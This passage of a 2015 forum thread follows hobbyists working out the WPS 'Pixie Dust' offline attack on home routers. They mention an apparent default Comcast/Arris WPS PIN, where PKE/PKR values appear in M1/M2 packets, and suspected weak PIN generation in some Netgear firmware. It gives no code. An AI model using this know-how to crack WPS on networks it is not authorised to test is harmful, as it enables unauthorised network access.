  43. #93
    Join Date
    2015-Mar
    Posts
    141
    Quote Originally Posted by soxrok2212 View Post
    I'm glad you tested it however, that is extremely weird. Perhaps Comcast uses this same undiscovered pin (until now) on all their TG862 models...?
    Other HOME-XXXX networks I have tested did produce a different pin. But I was unable to verify the pins as the wps process on the router crashed (?), I will try and verify the pins on those later.
    But two of the HOME-XXXX(Arris routers) networks I tested produced the same pin, only one verified.

    I was thinking more like, if wps is disabled in the settings, it doesn't actually disable, instead it just changes to the default pin of 42000648. Anyone else confirm?

  44. #94
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Well someone else from Hack Forums reported the same exact issue and returned the same exact pins but thought they were just found in error so he didn't try them. He will try them in the next few days though...

    Also, comcast uses a few different gateways as well (SMC for example, which is also ralink and vulnerable), so maybe that is why you got different pins.
    Last edited by soxrok2212; 2015-03-30 at 01:07.

  45. #95
    Join Date
    2013-Jul
    Posts
    818
    To wn722

    See thread #78 above posted by Soxrok2212

    Any problems write here and we will talk you thru the process. Our problem is confirming the -pke -pkr. Any commentary would be helpful.

    MTeams

  46. #96
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by mmusket33 View Post
    To wn722

    See thread #78 above posted by Soxrok2212

    Any problems write here and we will talk you thru the process. Our problem is confirming the -pke -pkr. Any commentary would be helpful.

    MTeams
    As of now, PKE and PKR can be found in wireshark in M1 and M2 packets... I haven't been able to find where they are debugged in reaver's source. Still looking into it.

  47. #97
    Join Date
    2014-Aug
    Posts
    3
    Dudux, I used the 1 pasted by soxrok that you asked him to post on bitbucket. This one - https://bitbucket.org/dudux/wpsoffli...e.py?at=master
    Quote Originally Posted by dudux View Post
    @h4x0rm1k3: which script did you use?

  48. #98
    Join Date
    2015-Mar
    Posts
    141
    Quote Originally Posted by soxrok2212 View Post
    As of now, PKE and PKR can be found in wireshark in M1 and M2 packets... I haven't been able to find where they are debugged in reaver's source. Still looking into it.
    I've been digging through the source of bully/reaver also looking for where they are p****d also, so far nothing but dead ends, though I don't really know c very well either. Digging around where it mentions pubkey seems to be around where it would be though. Bear with me here, picking it up as I go. :-)

    Hopefully something we can feed a pcap through to give all the required info, derive the pin, and if successful spawn reaver/bully to test and retrieve the psk. Though a live solution would be better ie a patch to bully/reaver.

  49. #99
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Datahead and I began digging into Netgear router's source and found some interesting bits of information. We think that we might have found how the actually pin is generated... Simply with a defined rand() function. It looks as if it uses the dev password (which can be found in the M1 packet in a WPS transaction) and has something to do with the system time. We are looking for help from crypto people who know what they are doing. It's looks promising, the same thing was found in 2/2 checked source codes so far: WNDR3400v2 and R6300v1.

  50. #100
    Join Date
    2013-Sep
    Posts
    262
    Very interisting what you say about netgear... are you talking about cg3100 series?
    And... *** with the Router with 2 PIN enabled? How did they manage that .... Incredible...
    Very good work guys, it is impressing

Similar Threads

  1. WPS Pixie Dust Attack (Offline WPS Attack)
    By soxrok2212 in forum General Archive
    Replies: 353
    Last Post: 2015-05-05, 08:32
  2. Pixiewps: wps pixie dust attack tool
    By wiire in forum General Archive
    Replies: 89
    Last Post: 2015-05-04, 19:32
  3. Implement new WPS Pixie Dust Attack into Reaver
    By six in forum General Archive
    Replies: 24
    Last Post: 2015-01-28, 20:31

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •